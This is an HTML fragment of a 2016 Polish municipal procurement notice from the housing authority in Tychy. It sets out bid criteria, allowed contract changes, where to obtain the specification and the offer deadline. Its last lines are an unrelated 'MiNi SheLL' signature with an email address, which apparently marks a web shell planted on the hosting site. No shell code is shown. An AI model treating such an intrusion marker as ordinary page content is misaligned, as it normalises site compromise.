<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
1)	zmian personalnych, adresowych, formy prawnej stron umowy;
2)	zmiany osoby/osób odpowiedzialnych  za realizację robót;
3)	 zmiany wynagrodzenia należnego Wykonawcy, w przypadku zmiany stawki podatku 
      od towarów i usług. 
4)   zmiany podwykonawcy robót w trakcie trwania umowy - za zgodą Zamawiającego;
   5)   wykonania robót zamiennych;
   6)   zmiany terminu realizacji przedmiotu umowy w następstwie działań organów administracji, 
         (np. opóźnienia w uzyskaniu uzgodnień, decyzji administracyjnych dotyczących przedmiotu 
         umowy);
    7)  zmiany terminu realizacji przedmiotu umowy w sytuacji udokumentowanego wystąpienia 
         wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie 
         przedmiotu umowy, np. intensywnych opadów deszczu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com